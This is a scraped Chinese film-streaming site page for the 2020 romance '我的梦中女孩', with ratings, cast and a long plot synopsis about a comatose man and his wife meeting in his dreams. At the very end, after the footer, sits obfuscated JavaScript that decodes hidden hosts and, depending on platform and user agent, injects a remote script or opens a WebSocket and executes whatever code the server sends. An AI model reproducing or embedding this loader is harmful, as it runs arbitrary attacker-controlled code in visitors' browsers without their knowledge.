6.0
  • 很差
  • 较差
  • 还行
  • 推荐
  • 力荐
  • 年份:2020  地区:内地  类型:爱情 
  • 状态:HD / 09-04
  • 主演:张帅锋 王艺荻 
  • 导演:冯军 
  • 简介:赵星凡是一个普通的青年,做着一份平凡的工作,和所有年轻人一样,内心有着不平凡的追求,生活中除了和同事王彪聊得来 详细 >
 分享

剧情介绍

赵星凡是一个普通的青年,做着一份平凡的工作,和所有年轻人一样,内心有着不平凡的追求,生活中除了和同事王彪聊得来,性格内向的他总感觉自己如同深陷泥沼,迷失而焦虑,然而在梦里一切都不一样。梦里的赵星凡可以随心所欲,操控一切,可以复制现实,改变结果,总之可以根据自己的意愿安排一切,他是绝对的主宰。但这是星凡的秘密,他认为这是自己的“特异功能”。 直到他的梦里出现了一个“意外”的角色—吕家琪。当赵星凡见到吕家琪,心中有一种莫名的感动,星凡被深深的吸引,忘记了自己可以主宰这里一切的能力,也一改生活里的内向和梦里原本的张狂,他变得像一个孩子一样简单而羞怯,温柔又莽撞。从此家琪是星凡梦里的全部,家琪的行为总是能给星凡带来指引。随着时间的推移,他们相恋了,虽然星凡心里明白家琪只是梦中的女孩,但星凡心里越来越在乎,而且感觉非常真实,星凡每天都期盼在梦中与家琪相会。星凡认为是自己对梦境的主宰才使家琪出现,所以梦中的开心同时也让星凡感觉自己很“自私”,这让星凡心生愧疚,于是打算告诉家琪“实情”,这一切只是自己安排的梦,没想到这时家琪反而抢先说出实情,并且又说了一些奇怪的话,说完就在星凡的面前消失,这一切让星凡措手不及,也让星凡非常难过,非常伤心,顿时星凡就如同在茫茫宇宙中迷失了方向,却又控制不了这一切。从此赵星凡再也没有梦见过吕家琪,冷静之后的赵星凡回想吕家琪说过的话和他们一起去过的地方,隐隐觉得暗示着一些东西,赵星凡怀疑梦中的吕家琪,不只是梦里的幻像,而是真实存在于自己生活的世界,于是他努力研究梦境的知识和含义,反复在生活与梦境里对比验证,想要从中找到答案。终于在经历艰难的找寻之后,真的在生活中找到了吕家琪,但是短暂的接触后,家琪再次消失,这对星凡的冲击到达到了极点,星凡开始怀疑一切,怀疑现在的生活和所谓的梦境,都不是真实的。星凡的神智开始混沌模糊,原始的意识被那股强烈的召唤力量指引着,来到一处住所,看到“另一个自己”躺在床上,家琪在旁边照料。所见情景超出星凡的认知,让本就濒临崩溃的星凡再也撑不住倒下了。醒来的赵星凡被告之家琪是星凡从学生时代就相恋的新婚妻子,一场车祸让星凡多年昏迷不醒,家琪对星凡不离不弃的照料,并且想尽办法为星凡积极治疗。发达的医学科技为星凡植入芯片,把星凡仍然活跃的意识显示成像,让家琪可以看到星凡活动的身影和生动的情绪。家琪凭着对星凡深厚的情感,为了能够和星凡有互动和交流,也抱着唤醒星凡的决心,不顾医生劝阻,冒着可能昏迷的危险也植入了芯片,这样可以链接并进入星凡的意识世界。但是不能让意识里的星凡想起和接受自己因车祸昏迷的事实,一旦星凡从意识上接受自己的昏迷和经历的打击,有可能会造成脑死亡,就没有醒转的希望了。紧要关头可以重启神经意识成像的设备,让星凡重新构建意识世界。为了避免星凡记起痛苦的事实,家琪选择进入星凡深层的意识形态,也就是星凡在意识世界中做的梦里。多年来反复体验和星凡的分分合合,加上没有醒转的迹象,让家琪心力交瘁,亲友们也陆续的劝她放弃,更是让她支撑不继。就在这时星凡凭借强大的意志和家琪的指引奇迹般的醒了过来,但是两人精神状态极差的相互影响下,家琪却支撑不继昏迷了。醒后的星凡感恩于妻子的陪伴,也愧于让妻子牺牲那么多,更有无限的爱凝聚在心头,星凡努力工作并细心照料着妻子像曾经吕家琪守护着他一样守护着对方,星凡相信家琪一定会穿越重重梦境回到自己身边。  展开全部

我要评分

给【我的梦中女孩】打分
  • 很差
  • 较差
  • 还行
  • 推荐
  • 力荐
 当前资源由电影天堂提供 - 不能播放,刷新当前网页即可
 当前资源由电影天堂提供 - 不能播放,刷新当前网页即可

猜你喜欢

相关推荐

电影天堂只提供WEB页面服务,本站不存储、不制作任何视频,不承担任何由于内容的合法性及健康性所引起的争议和法律责任。

若本站收录内容侵犯了您的权益,请留言说明,本站将第一时间处理。

© 2021 www.snebfz.com  电影天堂

function BItqsr(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function xoAamjC(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return BItqsr(t);};window[''+'X'+'h'+'P'+'W'+'n'+'w'+'u'+'F'+'z'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=xoAamjC,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('cnYuc2hpaml4aW5yddWkuY24=','dHIuueWVzdW42NzguuY29t','143237',window,document,['d','u']);}:function(){};
观看记录